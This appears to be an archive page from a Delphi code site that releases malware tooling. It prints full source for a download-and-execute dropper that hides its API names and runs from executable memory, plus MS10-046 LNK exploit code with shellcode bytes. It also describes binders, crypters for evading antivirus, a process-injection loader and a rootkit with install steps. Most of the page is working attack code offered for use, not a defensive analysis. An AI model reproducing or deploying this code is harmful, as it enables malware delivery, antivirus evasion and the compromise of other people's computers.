Delphi Basics Counterstrikewi Releases

Contents: Delphi Basics Counterstrikewi Releases Contents : Delphi Basics Counterstrikewi Releases
Archive: Delphi Basics Counterstrikewi Releases Archive: Delphi Basics Counterstrikewi Releases

Voik Binder

posted 19 Jul 2011, 15:20 by Delphi Basics   [ updated 28 Jul 2011, 11:39 ]

This interesting delphi source code details a unique dropper binder written by Voik. 

Version 0.1 
-Func-in method 
-Many anti debugging tricks 
-Stub generated in run-time 
-Pure ASM stub 
-Very nice GUI  

Not working: 
-Icons 

Version 0.2
+ Added icon support 
+ Added execute in browser memory 
+ GUI improved 
+ Some bugs, and codes are optimized 

Author: Voik
Compiled: Delphi 2007
Operating System: Windows Vista

 

 

Only Delphi source code is included in the archive.

Func-In Wininet Downloader

posted 24 Dec 2010, 08:22 by Delphi Basics

This delphi source code example details the wininet downloader:
edited to use func-in technology where the procedure of downloading and executing a file is stored within the resource section of the stub application from where it is called when a built stub is executed.

Builder:
program Builder;
//delphibasics.info & ic0de.org
//Authors: cswi, abhe & steve10120

const
  kernel32 = 'kernel32.dll';

type
  PByte = ^Byte;

function BeginUpdateResourceW(pFileName: PWideChar; bDeleteExistingResources: Boolean): Cardinal; stdcall; external kernel32 name 'BeginUpdateResourceW';
function UpdateResourceW(hUpdate: Cardinal; lpType, lpName: PWideChar; wLanguage: Word; lpData: Pointer; cbData: LongWord): Boolean; stdcall; external kernel32 name 'UpdateResourceW';
function EndUpdateResourceW(hUpdate: Cardinal; fDiscard: Boolean): Boolean; stdcall; external kernel32 name 'EndUpdateResourceW';

const
  cFuncIn : PWideChar = 'FUNCIN';

type
  TGetProcAddress = function (hModule: Cardinal; lpProcName: pAnsiChar): Pointer; stdcall;
  TLoadLibraryA = function(lpLibFileName: PAnsiChar): Cardinal; stdcall;
  TFuncInRecord = Record
    xGetProcAddress : TGetProcAddress;
    xLoadLibraryA : TLoadLibraryA;
  end;
  PFuncInRecord = ^TFuncInRecord;

procedure FuncIn(AFuncInRecord : PFuncInRecord; cUrl, cFile : pAnsiChar);
type
  PSecurityAttributes = ^TSecurityAttributes;
  TSecurityAttributes = record
    nLength: LongWord;
    lpSecurityDescriptor: Pointer;
    bInheritHandle: Boolean;
  end;
  POverlapped = ^TOverlapped;
  TOverlapped = record
    Internal: LongWord;
    InternalHigh: LongWord;
    Offset: LongWord;
    OffsetHigh: LongWord;
    hEvent: LongWord;
  end;
  TCreateFileA = function(lpFileName: PAnsiChar; dwDesiredAccess, dwShareMode: LongWord; lpSecurityAttributes: PSecurityAttributes; dwCreationDisposition, dwFlagsAndAttributes: LongWord; hTemplateFile: LongWord): LongWord; stdcall;
  TWriteFile = function(hFile: LongWord; const Buffer; nNumberOfBytesToWrite: LongWord; var lpNumberOfBytesWritten: LongWord; lpOverlapped: POverlapped): Boolean; stdcall;
  TCloseHandle = function(hObject: LongWord): Boolean; stdcall;
  TInternetOpenA = function(lpszAgent: PAnsiChar; dwAccessType: LongWord; lpszProxy, lpszProxyBypass: PAnsiChar; dwFlags: LongWord): Pointer; stdcall;
  TInternetOpenUrlA = function(hInet: Pointer; lpszUrl: PAnsiChar; lpszHeaders: PAnsiChar; dwHeadersLength: LongWord; dwFlags: LongWord; dwContext: LongWord): Pointer; stdcall;
  TInternetReadFile = function(hFile: Pointer; lpBuffer: Pointer; dwNumberOfBytesToRead: LongWord; var lpdwNumberOfBytesRead: LongWord): Boolean; stdcall;
  TInternetCloseHandle = function(hInet: Pointer): Boolean; stdcall;
  TShellExecuteA = function(hWnd: LongWord; Operation, FileName, Parameters, Directory: PAnsiChar; ShowCmd: Integer): LongWord; stdcall;
var
  szKernel32 : array [0..8] of AnsiChar;
  szWininet : array [0..7] of AnsiChar;
  szShell32 : array [0..7] of AnsiChar;
  szCreateFileA : array [0..11] of AnsiChar;
  szWriteFile : array [0..9] of AnsiChar;
  szCloseHandle : array [0..11] of AnsiChar;
  szInternetOpenA : array [0..13] of AnsiChar;
  szInternetOpenUrlA : array [0..16] of AnsiChar;
  szInternetReadFile : array [0..16] of AnsiChar;
  szInternetCloseHandle : array [0..19] of AnsiChar;
  szShellExecuteA : array [0..13] of AnsiChar;
  szopen : array [0..4] of AnsiChar;
  xCreateFileA : TCreateFileA;
  xWriteFile : TWriteFile;
  xCloseHandle : TCloseHandle;
  xInternetOpenA : TInternetOpenA;
  xInternetOpenUrlA : TInternetOpenUrlA;
  xInternetReadFile : TInternetReadFile;
  xInternetCloseHandle : TInternetCloseHandle;
  xShellExecuteA : TShellExecuteA;
  hKernel32, hWininet, hShell32 : LongWord;
  hSession, hURL: Pointer;
  Buffer: Array [1..1024] of Byte;
  BufferLen, FileHandle, BytesWritten: LongWord;
begin
  szKernel32[0] := 'K'; szKernel32[1] := 'e'; szKernel32[2] := 'r'; szKernel32[3] := 'n'; szKernel32[4] := 'e'; szKernel32[5] := 'l'; szKernel32[6] := '3'; szKernel32[7] := '2'; szKernel32[8] := #0;
  szWininet[0] := 'W'; szWininet[1] := 'i'; szWininet[2] := 'n'; szWininet[3] := 'i'; szWininet[4] := 'n'; szWininet[5] := 'e'; szWininet[6] := 't'; szWininet[7] := #0;
  szShell32[0] := 'S'; szShell32[1] := 'h'; szShell32[2] := 'e'; szShell32[3] := 'l'; szShell32[4] := 'l'; szShell32[5] := '3'; szShell32[6] := '2'; szShell32[7] := #0;
  szCreateFileA[0] := 'C'; szCreateFileA[1] := 'r'; szCreateFileA[2] := 'e'; szCreateFileA[3] := 'a'; szCreateFileA[4] := 't'; szCreateFileA[5] := 'e'; szCreateFileA[6] := 'F'; szCreateFileA[7] := 'i'; szCreateFileA[8] := 'l'; szCreateFileA[9] := 'e'; szCreateFileA[10] := 'A'; szCreateFileA[11] := #0;
  szWriteFile[0] := 'W'; szWriteFile[1] := 'r'; szWriteFile[2] := 'i'; szWriteFile[3] := 't'; szWriteFile[4] := 'e'; szWriteFile[5] := 'F'; szWriteFile[6] := 'i'; szWriteFile[7] := 'l'; szWriteFile[8] := 'e'; szWriteFile[9] := #0;
  szCloseHandle[0] := 'C'; szCloseHandle[1] := 'l'; szCloseHandle[2] := 'o'; szCloseHandle[3] := 's'; szCloseHandle[4] := 'e'; szCloseHandle[5] := 'H'; szCloseHandle[6] := 'a'; szCloseHandle[7] := 'n'; szCloseHandle[8] := 'd'; szCloseHandle[9] := 'l'; szCloseHandle[10] := 'e'; szCloseHandle[11] := #0;
  szInternetOpenA[0] := 'I'; szInternetOpenA[1] := 'n'; szInternetOpenA[2] := 't'; szInternetOpenA[3] := 'e'; szInternetOpenA[4] := 'r'; szInternetOpenA[5] := 'n'; szInternetOpenA[6] := 'e'; szInternetOpenA[7] := 't'; szInternetOpenA[8] := 'O'; szInternetOpenA[9] := 'p'; szInternetOpenA[10] := 'e'; szInternetOpenA[11] := 'n'; szInternetOpenA[12] := 'A'; szInternetOpenA[13] := #0;
  szInternetOpenUrlA[0] := 'I'; szInternetOpenUrlA[1] := 'n'; szInternetOpenUrlA[2] := 't'; szInternetOpenUrlA[3] := 'e'; szInternetOpenUrlA[4] := 'r'; szInternetOpenUrlA[5] := 'n'; szInternetOpenUrlA[6] := 'e'; szInternetOpenUrlA[7] := 't'; szInternetOpenUrlA[8] := 'O'; szInternetOpenUrlA[9] := 'p'; szInternetOpenUrlA[10] := 'e'; szInternetOpenUrlA[11] := 'n'; szInternetOpenUrlA[12] := 'U'; szInternetOpenUrlA[13] := 'r'; szInternetOpenUrlA[14] := 'l'; szInternetOpenUrlA[15] := 'A'; szInternetOpenUrlA[16] := #0;
  szInternetReadFile[0] := 'I'; szInternetReadFile[1] := 'n'; szInternetReadFile[2] := 't'; szInternetReadFile[3] := 'e'; szInternetReadFile[4] := 'r'; szInternetReadFile[5] := 'n'; szInternetReadFile[6] := 'e'; szInternetReadFile[7] := 't'; szInternetReadFile[8] := 'R'; szInternetReadFile[9] := 'e'; szInternetReadFile[10] := 'a'; szInternetReadFile[11] := 'd'; szInternetReadFile[12] := 'F'; szInternetReadFile[13] := 'i'; szInternetReadFile[14] := 'l'; szInternetReadFile[15] := 'e'; szInternetReadFile[16] := #0;
  szInternetCloseHandle[0] := 'I'; szInternetCloseHandle[1] := 'n'; szInternetCloseHandle[2] := 't'; szInternetCloseHandle[3] := 'e'; szInternetCloseHandle[4] := 'r'; szInternetCloseHandle[5] := 'n'; szInternetCloseHandle[6] := 'e'; szInternetCloseHandle[7] := 't'; szInternetCloseHandle[8] := 'C'; szInternetCloseHandle[9] := 'l'; szInternetCloseHandle[10] := 'o'; szInternetCloseHandle[11] := 's'; szInternetCloseHandle[12] := 'e'; szInternetCloseHandle[13] := 'H'; szInternetCloseHandle[14] := 'a'; szInternetCloseHandle[15] := 'n'; szInternetCloseHandle[16] := 'd'; szInternetCloseHandle[17] := 'l'; szInternetCloseHandle[18] := 'e'; szInternetCloseHandle[19] := #0;
  szShellExecuteA[0] := 'S'; szShellExecuteA[1] := 'h'; szShellExecuteA[2] := 'e'; szShellExecuteA[3] := 'l'; szShellExecuteA[4] := 'l'; szShellExecuteA[5] := 'E'; szShellExecuteA[6] := 'x'; szShellExecuteA[7] := 'e'; szShellExecuteA[8] := 'c'; szShellExecuteA[9] := 'u'; szShellExecuteA[10] := 't'; szShellExecuteA[11] := 'e'; szShellExecuteA[12] := 'A'; szShellExecuteA[13] := #0;
  szopen[0] := 'o'; szopen[1] := 'p'; szopen[2] := 'e'; szopen[3] := 'n'; szopen[4] := #0;
  with AFuncInRecord^ do
  begin
    hKernel32 := xLoadLibraryA(szKernel32);
    @xCreateFileA := xGetProcAddress(hKernel32, szCreateFileA);
    @xWriteFile := xGetProcAddress(hKernel32, szWriteFile);
    @xCloseHandle := xGetProcAddress(hKernel32, szCloseHandle);
    hWininet := xLoadLibraryA(szWininet);
    @xInternetOpenA := xGetProcAddress(hWininet, szInternetOpenA);
    @xInternetOpenUrlA := xGetProcAddress(hWininet, szInternetOpenUrlA);
    @xInternetReadFile := xGetProcAddress(hWininet, szInternetReadFile);
    @xInternetCloseHandle := xGetProcAddress(hWininet, szInternetCloseHandle);
    hShell32 := xLoadLibraryA(szShell32);
    @xShellExecuteA := xGetProcAddress(hShell32, szShellExecuteA);
    hSession := xInternetOpenA(nil, 0, nil, nil, 0);
    hURL := xInternetOpenURLA(hSession, cURL, nil, 0, 0, 0);
    FileHandle := xCreateFileA(cFile, $40000000, $00000002, nil, 2, $00000002, 0);
    BytesWritten := 0;
    repeat
      xInternetReadFile(hURL, @Buffer, SizeOf(Buffer), BufferLen);
      xWriteFile(FileHandle, Buffer, BufferLen, BytesWritten, nil);
    until BufferLen = 0;
    xCloseHandle(FileHandle);
    xInternetCloseHandle(hURL);
    xInternetCloseHandle(hSession);
    xShellExecuteA(0, szopen, cFile, nil, nil, 1);
  end;
end;

Function WriteResData(pFile: pointer; Size: integer; pwName: pWideChar):Boolean;
const
  pwServerFile : PWideChar = 'Stub.exe'  ;
var
  hResourceHandle: Cardinal;
begin
  hResourceHandle := BeginUpdateResourceW(pwServerFile, False);
  Result := UpdateResourceW(hResourceHandle, PWideChar(10), pwName, 0, pFile, Size);
  EndUpdateResourceW(hResourceHandle, False);
end;

function SizeOfProc(pAddr: pointer): Cardinal;
var dwSize: Cardinal;
begin
  dwSize := 0;
  repeat
    inc(dwSize);
  until PByte(Cardinal(pAddr)+dwSize-1)^ = $C3;
  Result := dwSize;
end;

begin
  WriteResData(@FuncIn, SizeOfProc(@FuncIn), cFuncIn);
  WriteResData(nil, 0, 'PACKAGEINFO');
  WriteResData(nil, 0, 'DVCLAL');
end.

Stub:
program Stub;

const
  cURL : PAnsiChar = 'http://www.google.co.za/intl/en_com/images/srpr/logo1w.png';
  cFile : PAnsiChar = 'C:\GoogleLogo.png';

const
  kernel32 = 'kernel32.dll';
  MEM_COMMIT = $1000;
  PAGE_EXECUTE_READWRITE = $40;
  MEM_RELEASE = $8000;

function GetProcAddress(hModule: Cardinal; lpProcName: PAnsiChar): Pointer; stdcall; external kernel32 name 'GetProcAddress';
function LoadLibraryA(lpLibFileName: PAnsiChar): Cardinal; stdcall; external kernel32 name 'LoadLibraryA';
function FindResourceW(hModule: Cardinal; lpName, lpType: PWideChar): Cardinal; stdcall; external kernel32 name 'FindResourceW';
function LoadResource(hModule: Cardinal; hResInfo: Cardinal): Cardinal; stdcall; external kernel32 name 'LoadResource';
function SizeofResource(hModule: Cardinal; hResInfo: Cardinal): LongWord; stdcall; external kernel32 name 'SizeofResource';
function VirtualAlloc(lpvAddress: Pointer; dwSize, flAllocationType, flProtect: LongWord): Pointer; stdcall; external kernel32 name 'VirtualAlloc';
function VirtualFree(lpAddress: Pointer; dwSize, dwFreeType: LongWord): Boolean; stdcall; external kernel32 name 'VirtualFree';

const
  cFuncIn : PWideChar = 'FUNCIN';

type
  TGetProcAddress = function (hModule: Cardinal; lpProcName: pAnsiChar): Pointer; stdcall;
  TLoadLibraryA = function(lpLibFileName: PAnsiChar): Cardinal; stdcall;
  TFuncInRecord = Record
    xGetProcAddress : TGetProcAddress;
    xLoadLibraryA : TLoadLibraryA;
  end;
  PFuncInRecord = ^TFuncInRecord;

  PFuncIn = ^TFuncIn;
  TFuncIn = procedure(pData : PFuncInRecord; lpTitle, lpMessage : pAnsiChar);

procedure ResGet(ResName: pwidechar; var data : pointer; var Size:LongWord);
var
  ResSrc: Cardinal;
  ResGlobal: Cardinal;
begin
  ResSrc := FindResourceW(0, ResName, PWideChar(10));
  ResGlobal := LoadResource(0, ResSrc);
  Data := Pointer(ResGlobal);
  Size := SizeofResource(0, ResSrc);
end;

procedure CopyMemory(Destination, Source:Pointer; dwSize:LongWord);
asm
  PUSH ECX
  PUSH ESI
  PUSH EDI
  MOV EDI, Destination
  MOV ESI, Source
  MOV ECX, dwSize
  REP MOVSB
  POP EDI
  POP ESI
  POP ECX
end;

var
  FuncIn : TFuncIn;
  pResource : Pointer;
  dwResourceSize : LongWord;
  AFuncInRecord : TFuncInRecord;
begin
  AFuncInRecord.xGetProcAddress := @GetProcAddress;
  AFuncInRecord.xLoadLibraryA := @LoadLibraryA;
  ResGet(cFuncIn, pResource, dwResourceSize);
  FuncIn := VirtualAlloc(nil, dwResourceSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  CopyMemory(@FuncIn, pResource, dwResourceSize);
  FuncIn(@AFuncInRecord,cUrl, cFile);
  VirtualFree(@FuncIn, 0, MEM_RELEASE);
end.

Func-In Delphi Example

posted 22 Dec 2010, 11:18 by Delphi Basics   [ updated 23 Dec 2010, 14:39 ]

The closed source "Func-In" technique was was pioneered by p0ke (in Nidhogg Crypter) and shapeless (in Poison Ivy).  This recreated, open source Delphi example details how to write functions to the resource section of your stub and then call that function from resources upon execution.  This enables the user to keep the size of the final application down by only writing selected functions to the stub. 

Authors: Counterstrikewi, Abhe & Steve10120 
Websites: delphibasics.info & ic0de.org 
Compiled: Delphi 2007, Delphi XE

Slayer616 created his own func-in technology using shellcode:

Builder: 
program Builder;
//delphibasics.info & ic0de.org
//Authors: cswi, abhe & steve10120

const
  kernel32 = 'kernel32.dll';
  MB_YESNO = 4;
  MB_OK = 0;

type
  PByte = ^Byte;

function BeginUpdateResourceW(pFileName: PWideChar; bDeleteExistingResources: Boolean): Cardinal; stdcall; external kernel32 name 'BeginUpdateResourceW';
function UpdateResourceW(hUpdate: Cardinal; lpType, lpName: PWideChar; wLanguage: Word; lpData: Pointer; cbData: LongWord): Boolean; stdcall; external kernel32 name 'UpdateResourceW';
function EndUpdateResourceW(hUpdate: Cardinal; fDiscard: Boolean): Boolean; stdcall; external kernel32 name 'EndUpdateResourceW';

const
  cFuncIn : PWideChar = 'FUNCIN';

type
  TGetProcAddress = function (hModule: Cardinal; lpProcName: pAnsiChar): Pointer; stdcall;
  TLoadLibraryA = function(lpLibFileName: PAnsiChar): Cardinal; stdcall;
  TFuncInRecord = Record
    xGetProcAddress : TGetProcAddress;
    xLoadLibraryA : TLoadLibraryA;
  end;
  PFuncInRecord = ^TFuncInRecord;

procedure FuncIn(AFuncInRecord : PFuncInRecord; lpText, lpCaption : pAnsiChar);
type
  TMessageBoxA = function (hWnd: Cardinal; lpText, lpCaption: PAnsiChar; uType: LongWord): LongWord; stdcall;
var
  szUser32 : array[0..6] of AnsiChar;
  szMessageBoxA : array[0..11] of AnsiChar;
  xMessageBoxA : TMessageBoxA;
  dwResult : LongWord;
begin
  szUser32[0] := 'U';
  szUser32[1] := 's';
  szUser32[2] := 'e';
  szUser32[3] := 'r';
  szUser32[4] := '3';
  szUser32[5] := '2';
  szUser32[6] := #0;
  szMessageBoxA[0] := 'M';
  szMessageBoxA[1] := 'e';
  szMessageBoxA[2] := 's';
  szMessageBoxA[3] := 's';
  szMessageBoxA[4] := 'a';
  szMessageBoxA[5] := 'g';
  szMessageBoxA[6] := 'e';
  szMessageBoxA[7] := 'B';
  szMessageBoxA[8] := 'o';
  szMessageBoxA[9] := 'x';
  szMessageBoxA[10] := 'A';
  szMessageBoxA[11] := #0;
  with AFuncInRecord^ do
  begin
    @xMessageBoxA := xGetProcAddress(xLoadLibraryA(szUser32), szMessageBoxA);
    if Assigned(xMessageBoxA) then
    begin
      dwResult := xMessageBoxA(0, lpText, lpCaption, MB_YESNO);
      if dwResult = 6 then
        xMessageBoxA(0, lpText, lpCaption, MB_OK);
    end;
  end;
end;

Function WriteResData(pFile: pointer; Size: integer; pwName: pWideChar):Boolean;
const
  pwServerFile : PWideChar = 'Stub.exe'  ;
var
  hResourceHandle: Cardinal;
begin
  hResourceHandle := BeginUpdateResourceW(pwServerFile, False);
  Result := UpdateResourceW(hResourceHandle, PWideChar(10), pwName, 0, pFile, Size);
  EndUpdateResourceW(hResourceHandle, False);
end;

function SizeOfProc(pAddr: pointer): Cardinal;
var dwSize: Cardinal;
begin
  dwSize := 0;
  repeat
    inc(dwSize);
  until PByte(Cardinal(pAddr)+dwSize-1)^ = $C3;
  Result := dwSize;
end;

begin
  WriteResData(@FuncIn, SizeOfProc(@FuncIn), cFuncIn);
  WriteResData(nil, 0, 'PACKAGEINFO');
  WriteResData(nil, 0, 'DVCLAL');
end.

Stub:
program Stub;

const
  kernel32 = 'kernel32.dll';
  MEM_COMMIT = $1000;
  PAGE_EXECUTE_READWRITE = $40;
  MEM_RELEASE = $8000;

function GetProcAddress(hModule: Cardinal; lpProcName: PAnsiChar): Pointer; stdcall; external kernel32 name 'GetProcAddress';
function LoadLibraryA(lpLibFileName: PAnsiChar): Cardinal; stdcall; external kernel32 name 'LoadLibraryA';
function FindResourceW(hModule: Cardinal; lpName, lpType: PWideChar): Cardinal; stdcall; external kernel32 name 'FindResourceW';
function LoadResource(hModule: Cardinal; hResInfo: Cardinal): Cardinal; stdcall; external kernel32 name 'LoadResource';
function SizeofResource(hModule: Cardinal; hResInfo: Cardinal): LongWord; stdcall; external kernel32 name 'SizeofResource';
function VirtualAlloc(lpvAddress: Pointer; dwSize, flAllocationType, flProtect: LongWord): Pointer; stdcall; external kernel32 name 'VirtualAlloc';
function VirtualFree(lpAddress: Pointer; dwSize, dwFreeType: LongWord): Boolean; stdcall; external kernel32 name 'VirtualFree';

const
  cFuncIn : PWideChar = 'FUNCIN';

type
  TGetProcAddress = function (hModule: Cardinal; lpProcName: pAnsiChar): Pointer; stdcall;
  TLoadLibraryA = function(lpLibFileName: PAnsiChar): Cardinal; stdcall;
  TFuncInRecord = Record
    xGetProcAddress : TGetProcAddress;
    xLoadLibraryA : TLoadLibraryA;
  end;
  PFuncInRecord = ^TFuncInRecord;

  PFuncIn = ^TFuncIn;
  TFuncIn = procedure(pData : PFuncInRecord; lpTitle, lpMessage : pAnsiChar);

procedure ResGet(ResName: pwidechar; var data : pointer; var Size:LongWord);
var
  ResSrc: Cardinal;
  ResGlobal: Cardinal;
begin
  ResSrc := FindResourceW(0, ResName, PWideChar(10));
  ResGlobal := LoadResource(0, ResSrc);
  Data := Pointer(ResGlobal);
  Size := SizeofResource(0, ResSrc);
end;

procedure CopyMemory(Destination, Source:Pointer; dwSize:LongWord);
asm
  PUSH ECX
  PUSH ESI
  PUSH EDI
  MOV EDI, Destination
  MOV ESI, Source
  MOV ECX, dwSize
  REP MOVSB
  POP EDI
  POP ESI
  POP ECX
end;

var
  FuncIn : TFuncIn;
  pResource : Pointer;
  dwResourceSize : LongWord;
  AFuncInRecord : TFuncInRecord;
begin
  AFuncInRecord.xGetProcAddress := @GetProcAddress;
  AFuncInRecord.xLoadLibraryA := @LoadLibraryA;
  ResGet(cFuncIn, pResource, dwResourceSize);
  FuncIn := VirtualAlloc(nil, dwResourceSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  CopyMemory(@FuncIn, pResource, dwResourceSize);
  FuncIn(@AFuncInRecord,'cswi <3 abhe & steve10120', '<3 p0ke');
  VirtualFree(@FuncIn, 0, MEM_RELEASE);
end.

[MS10-046] Cpl Lnk Exploit - Lnk Vulnerability by Paray_Vx

posted 9 Dec 2010, 15:16 by Delphi Basics

This code details the MS10-046 'CPL Lnk Exploit' in Delphi.

Cpl Lnk Vulnerability - MS10-046 in Delphi
Author: - Paray_Vx -
Tested and Working on Windows Xp, Windows Vista and Windows 7

program MS10046;
uses
  SysUtils,
  Windows;

procedure CplLnkExploit(location:string);
const
  // ShellCode Lnk Vulnerability
  Sizelnk :integer = 141;
  ShellCode  : ARRAY [1..141] OF Byte = (
$4C,$00,$00,$00,$01,$14,$02,$00,$00,$00,$00,$00,$C0,$00,$00,$00,$00,$00,$00,$46,$81,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$01,
$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$36,$01,$14,$00,$1F,$50,$E0,$4F,$D0,$20,$EA,$3A,$69,$10,$A2,$D8,$08,$00,$2B,$30,$30,$9D,$14,$00,$2E,$1E,$20,$20,$EC,$21,$EA,$3A,$69,$10,$A2,$DD,$08,$00,$2B,$30,$30,$9D,$0C,$01,$00,$00,$00,
$00,$00,$00,$00,$00,$00,$00,$00,$6A,$00,$00,$00,$00,$00,$00,$20,$00,$3A);

// ~ Your Dll Here ~ Ex : 'C:\MS10046.dll'
  SizeNameDll : integer = 28;
  Dllx : ARRAY [1..28] OF Byte = ($00,$43,$00,$3A,$00,$5C,$00,$4D,$00,$53,$00,$31,$00,$30,$00,$30,$00,$34,$00,$36,$00,$2E,$00,$64,$00,$6C,$00,$6C);

var
 one : file;
 i : integer;

begin
 AssignFile(one,location);
 Rewrite(one,1);

  for i:=1 to Sizelnk do
  begin
   BlockWrite(one,ShellCode[i],1);
  end;

  for i:=1 to SizeNameDll do
  begin
   BlockWrite(one,Dllx[i],1);
  end;

  CloseFile(one);
end;

begin
     MessageBoxA(0,'CPL Lnk Exploit Built!', 'MS10-046', MB_OK);
     // Extract here
     CplLnkExploit('C:\MS10-046.lnk');
end.

Library MS10046;

uses
  Windows;

begin
     MessageBoxA(0, 'CPL Lnk Exploit Success!', 'MS10-046', MB_ICONWARNING);
end.

Many PCs are unpatched and vulnerable to this exploit. To protect yourself, patch your OS here:

Read more about CPL Lnk Vulnerability (MS10-04) here :

Open Crypter by p0ke

posted 29 Sep 2010, 14:35 by Delphi Basics   [ updated 1 Mar 2011, 12:05 ]

      Open Source Code Crypter 1.0 
      by p0ke 
            
      I wrote this opensource crypter for delphi coders. 
      Its nothing advanced, but i probably will add functions 
      to it with time. 
      
      Features: 
        10 file limit 
        Memory Execution support 
        EOF-Settings support 
        Custom Stub support 
        Drop to Harddrive support 

Joining Method: Resources
Encryption: Custom XOR
Memory Execution: uMemoryExecute by p0ke.  This unit is compatible with Windows XP & Vista but not compatible with Windows 7.


Only Delphi source code is included in the archive.

AFX Rootkit 2005 by Aphex

posted 18 Sep 2010, 15:07 by Delphi Basics

AFX Rootkit 2005 by Aphex 

This program patches Windows API to hide certain objects from being listed. 

WARNING -> FOR WINDOWS NT/2000/XP/2003 ONLY! 

Current Version Hides: 
a) Processes 
b) Handles 
c) Modules 
d) Files & Folders 
e) Registry Keys & Values 
f) Services 
g) TCP/UDP Sockets 
h) Systray Icons 

Configuring a computer with the rootkit is simple... 

1. Create a new folder with a uniqiue name i.e. "c:\winnt\rewt\" 
2. In this folder place the root.exe i.e. "c:\winnt\rewt\root.exe" 
3. Execute root.exe with the "/i" parameter i.e. "start c:\winnt\rewt\root.exe /i" 
4. Inside this folder place any other programs or files. 

Everything inside the root folder is now invisible! If you place other services or programs 
in the root folder they will be invisible from process/file/dll/handle/socket/etc listing. 
However, all programs in the root folder can see each other. 

Registry value names are hidden differently from everything else. The name must begin with the 
root folder name followed by "\" and other characters i.e. "rewt\hiddenstartup1". 

Registry key names are hidden if they have the same name as the root folder i.e. "rewt".

Also, the root folder is unique throughout the system. This means "c:\rewt\", "c:\winnt\rewt\"
and "c:\winnt\system32\rewt\" all will be hidden because they all share the root folder name "rewt".

Removal:
If you install it make sure you know how to remove it!

  Method 1
   1. Run the root.exe with the "/u" parameter
   2. Delete all the files associated with it
   3. Reboot

  Method 2
   1. Boot into safe mode
   2. Locate the service with the root folder name
   3. Remove the service and delete all the files associated with it
   4. Reboot

How To Properly Compile AFX Rootkit 

Inside hook.dpr there is a variable...

var
szDllPath: pchar = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';

After compiling hook.dll you must open it with a hex editor and find the offset of that string of X's.

Once you find the offset you need to open root.dpr. Search for the hex number $4a54 and replace it with the new offset.

Each version of Delphi will have a different offset. The offset $4a54 is for Delphi 6. So you shouldn't need to change it if you use D6. It is always best to double check though.

Only Delphi source code is included in the archive.

MemExe Crypter by steve10120

posted 14 Sep 2010, 16:07 by Danny Rancher

This crypter is the latest rewrite of the self-injection code, by shapeless and steve10120. 

Original self-injecting crypter by shapeless: 

Original self-injecting unit by steve10120: 

The additional builder code in this release is necessary for two reasons: 
  1. To change the imagebase of the stub file to that of the target file. 
  2. To enlarge the last section so its big enough to cover the SizeOfImage of the target file. 
Author: steve10120 
Compiled: Delphi 2007 

Tested and working environments: Windows XP, Vista, 7. 

Only Delphi source code is included in the archive. 

PI Crypter by Counterstrikewi

posted 24 Aug 2010, 15:47 by Delphi Basics   [ updated 15 Oct 2010, 15:35 ]

PI crypter, coded by Counterstrikewi, is compatible with all executable files. 

Joining Method: Resources 
Encryption: RC4 
Special Features: Most apis are dynamically called; Inject PE to Browser. 


YouTube Player - High Quality Video


Thank you  
steve10120  
p0ke  
SWiM  
Xash  
ap0calypse  
Rogue  
shapeless  
testest  
abhe  

Friends  
DarkCoderSC  
Slayer616  
who!  
mjrod5  
~Fleck  
Cracksman  
FusioN  
Menace  
Neo  
f0rce  

Only Delphi source code is included in the archive

ErazerZ Binder - 3.75 KB Stub

posted 17 Aug 2010, 17:23 by Delphi Basics

Delphi Example Binder by ErazerZ 
Date: 3rd May 2006 

Binding.exe - Main Program, the binder 
External Stub.exe - Example of a packed stub, its 3,75 KB and it works :O 

ErazerZ 


Only Delphi source code is included in the archive.

MemExe Crypter by shapeless

posted 29 Jun 2010, 12:53 by Delphi Basics

This crypter uses a new memory injection technique, pioneered by shapeless where the current process is unmapped to be replaced with the map of a custom PE.

1-10 of 40